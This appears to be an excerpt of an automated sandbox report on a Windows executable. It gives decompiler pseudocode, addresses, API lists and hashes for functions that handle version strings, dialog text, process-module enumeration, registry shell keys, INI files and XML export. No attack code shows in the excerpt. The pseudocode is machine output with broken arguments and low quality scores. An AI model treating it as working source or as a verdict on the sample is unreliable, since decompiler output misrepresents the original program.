                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                      • String ID: \StringFileInfo\
                                                                                      • API String ID: 393120378-2245444037
                                                                                      • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                      • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                      • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                      • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintfwcscpy
                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                      • API String ID: 999028693-502967061
                                                                                      • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                      • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                      • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                      • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 35%
                                                                                      			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
					if( *0x4101b8 != _t98) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(_t59 != 0) {
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								if(E00409510(_a8,  &_a8) != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t72 = OpenProcess(0x410, 0, _a4);
					_v0 = _t72;
					if(_t72 != 0) {
						_push( &_a4);
						_push(0x8000);
						_push( &_a2160);
						_push(_t72);
						if( *0x40f840() != 0) {
							_t6 =  &_v12;
							 *_t6 = _v12 >> 2;
							_v8 = 1;
							_t90 = 0;
							if( *_t6 != 0) {
								while(1) {
									_a1616 = _t98;
									memset( &_a1618, _t98, 0x208);
									memset( &_a8, _t98, 0x21c);
									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
									_t106 = _t106 + 0x18;
									_a8 = _a4;
									_a12 = _t78;
									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
									E0040920A( &_v0,  &_a1600);
									_push(0xc);
									_push( &_v20);
									_push(_v4);
									_push(_v32);
									if( *0x40f844() != 0) {
										_a508 = _v32;
										_a512 = _v36;
									}
									if(E00409510(_a8,  &_v24) == 0) {
										goto L18;
									}
									_t90 = _t90 + 1;
									if(_t90 < _v44) {
										_t98 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v16);
					}
				}
				return _a8;
			}
























                                                                                      0x004092f3
                                                                                      0x004092fb
                                                                                      0x00409303
                                                                                      0x00409305
                                                                                      0x00409310
                                                                                      0x00409439
                                                                                      0x0040943f
                                                                                      0x00409445
                                                                                      0x0040944e
                                                                                      0x00409452
                                                                                      0x00409466
                                                                                      0x0040946e
                                                                                      0x00409475
                                                                                      0x004094f7
                                                                                      0x00409488
                                                                                      0x00409494
                                                                                      0x004094a5
                                                                                      0x004094a9
                                                                                      0x004094b5
                                                                                      0x004094c3
                                                                                      0x004094c6
                                                                                      0x004094d5
                                                                                      0x004094e3
                                                                                      0x004094f1
                                                                                      0x00000000
                                                                                      0x004094f1
                                                                                      0x00000000
                                                                                      0x004094e3
                                                                                      0x00000000
                                                                                      0x004094f7
                                                                                      0x00409452
                                                                                      0x00409322
                                                                                      0x0040932b
                                                                                      0x00409333
                                                                                      0x00409337
                                                                                      0x00409341
                                                                                      0x00409342
                                                                                      0x0040934e
                                                                                      0x0040934f
                                                                                      0x00409358
                                                                                      0x0040935e
                                                                                      0x0040935e
                                                                                      0x00409363
                                                                                      0x0040936b
                                                                                      0x0040936d
                                                                                      0x00409377
                                                                                      0x00409385
                                                                                      0x0040938d
                                                                                      0x0040939d
                                                                                      0x004093a5
                                                                                      0x004093ac
                                                                                      0x004093b4
                                                                                      0x004093c5
                                                                                      0x004093c9
                                                                                      0x004093da
                                                                                      0x004093df
                                                                                      0x004093e5
                                                                                      0x004093e6
                                                                                      0x004093ea
                                                                                      0x004093f6
                                                                                      0x004093fc
                                                                                      0x00409407
                                                                                      0x00409407
                                                                                      0x0040941d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00409423
                                                                                      0x00409428
                                                                                      0x00409375
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040942e
                                                                                      0x00000000
                                                                                      0x00409428
                                                                                      0x00409377
                                                                                      0x0040936d
                                                                                      0x004094fb
                                                                                      0x004094ff
                                                                                      0x004094ff
                                                                                      0x00409337
                                                                                      0x0040950f

                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                      • memset.MSVCRT ref: 0040938D
                                                                                      • memset.MSVCRT ref: 0040939D
                                                                                        • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                      • memset.MSVCRT ref: 00409488
                                                                                      • wcscpy.MSVCRT ref: 004094A9
                                                                                      • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                      • String ID:
                                                                                      • API String ID: 3300951397-0
                                                                                      • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                      • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                      • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                      • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 44%
                                                                                      			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                      0x00402ed7
                                                                                      0x00402eee
                                                                                      0x00402ef8
                                                                                      0x00402f00
                                                                                      0x00402f01
                                                                                      0x00402f05
                                                                                      0x00402f0a
                                                                                      0x00402f1a
                                                                                      0x00402f30

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                      • String ID:
                                                                                      • API String ID: 19018683-0
                                                                                      • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                      • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                      • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                      • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 50%
                                                                                      			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                                      0x004079a4
                                                                                      0x004079b8
                                                                                      0x004079bd
                                                                                      0x004079c2
                                                                                      0x004079c5
                                                                                      0x004079c5
                                                                                      0x004079db
                                                                                      0x004079f7
                                                                                      0x00407a06
                                                                                      0x00407a0c
                                                                                      0x00407a11
                                                                                      0x00407a13
                                                                                      0x00407a14
                                                                                      0x00407a17
                                                                                      0x00407a18
                                                                                      0x00407a1d
                                                                                      0x00407a22
                                                                                      0x00407a25
                                                                                      0x00407a2a
                                                                                      0x00407a35
                                                                                      0x00407a3a
                                                                                      0x00407a3b
                                                                                      0x00407a40
                                                                                      0x00407a52

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004079DB
                                                                                        • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                        • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                        • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                      • _snwprintf.MSVCRT ref: 00407A25
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                      • API String ID: 1775345501-2769808009
                                                                                      • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                      • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                      • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                      • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 64%
                                                                                      			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                      0x00404683
                                                                                      0x00404692
                                                                                      0x00404699
                                                                                      0x0040469b
                                                                                      0x004046af
                                                                                      0x004046ba
                                                                                      0x004046bc
                                                                                      0x004046c7
                                                                                      0x004046cc
                                                                                      0x004046cd
                                                                                      0x004046ee
                                                                                      0x004046f3
                                                                                      0x004046fa
                                                                                      0x004046fa
                                                                                      0x004046ee
                                                                                      0x00404705

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004046AF
                                                                                      • _snwprintf.MSVCRT ref: 004046CD
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: CloseOpen_snwprintfmemset
                                                                                      • String ID: %s\shell\%s
                                                                                      • API String ID: 1458959524-3196117466
                                                                                      • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                      • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                      • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                      • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 16%
                                                                                      			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                                      0x00409d5f
                                                                                      0x00409d67
                                                                                      0x00409d70
                                                                                      0x00409ddb
                                                                                      0x00409d72
                                                                                      0x00409d74
                                                                                      0x00409db2
                                                                                      0x00409d84
                                                                                      0x00409d84
                                                                                      0x00409d8c
                                                                                      0x00409d8d
                                                                                      0x00409d98
                                                                                      0x00409d9d
                                                                                      0x00409d9e
                                                                                      0x00409da6
                                                                                      0x00409daf
                                                                                      0x00409daf
                                                                                      0x00409dc3
                                                                                      0x00409dc3

                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 00409D79
                                                                                      • _snwprintf.MSVCRT ref: 00409D9E
                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                      • String ID: "%s"
                                                                                      • API String ID: 1343145685-3297466227
                                                                                      • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                      • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                      • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                      • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 38%
                                                                                      			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                      0x004047d2
                                                                                      0x004047da
                                                                                      0x004047e0
                                                                                      0x004047e4
                                                                                      0x004047ec
                                                                                      0x004047ec
                                                                                      0x004047f5
                                                                                      0x00404800
                                                                                      0x00404801
                                                                                      0x00404802
                                                                                      0x0040480d
                                                                                      0x00404812
                                                                                      0x00404813
                                                                                      0x00404834

                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                      • _snwprintf.MSVCRT ref: 00404813
                                                                                      • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                      • String ID: Error$Error %d: %s
                                                                                      • API String ID: 313946961-1552265934
                                                                                      • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                      • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                      • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                      • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 90%
                                                                                      			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                                      0x004068ec
                                                                                      0x004068f0
                                                                                      0x004068f4
                                                                                      0x004068ff
                                                                                      0x00406902
                                                                                      0x0040690a
                                                                                      0x00406910
                                                                                      0x00406911
                                                                                      0x0040691b
                                                                                      0x0040691e
                                                                                      0x00406923
                                                                                      0x0040692d
                                                                                      0x0040692e
                                                                                      0x00406933
                                                                                      0x0040693d
                                                                                      0x00406940
                                                                                      0x00406949
                                                                                      0x0040694a
                                                                                      0x00406950
                                                                                      0x00406956
                                                                                      0x00406959
                                                                                      0x0040695c
                                                                                      0x00406964
                                                                                      0x0040696d
                                                                                      0x00406974
                                                                                      0x0040697e
                                                                                      0x00406989
                                                                                      0x00406990
                                                                                      0x00406998
                                                                                      0x0040699b
                                                                                      0x0040699f
                                                                                      0x004069b8
                                                                                      0x004069bc
                                                                                      0x004069c4
                                                                                      0x004069c7
                                                                                      0x004069c7
                                                                                      0x004069cb
                                                                                      0x004069ce
                                                                                      0x004069d4
                                                                                      0x004069d4
                                                                                      0x004069d9
                                                                                      0x004069df
                                                                                      0x004069e6
                                                                                      0x004069ea
                                                                                      0x004069ef
                                                                                      0x004069f2
                                                                                      0x004069f5
                                                                                      0x00406a00
                                                                                      0x00406a01
                                                                                      0x00406a06
                                                                                      0x00406a08
                                                                                      0x00406a0b
                                                                                      0x00406a10
                                                                                      0x00406a16
                                                                                      0x00406a25
                                                                                      0x00406a25
                                                                                      0x00406a18
                                                                                      0x00406a1e
                                                                                      0x00406a1e
                                                                                      0x00406a27
                                                                                      0x00406a2f
                                                                                      0x00406a32
                                                                                      0x00406a35
                                                                                      0x00406a3b
                                                                                      0x00406a41
                                                                                      0x00406a47
                                                                                      0x00406a4d
                                                                                      0x00406a53
                                                                                      0x00406a5d
                                                                                      0x00406a6d

                                                                                      APIs
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                      • memcpy.MSVCRT ref: 0040696D
                                                                                      • memcpy.MSVCRT ref: 0040697E
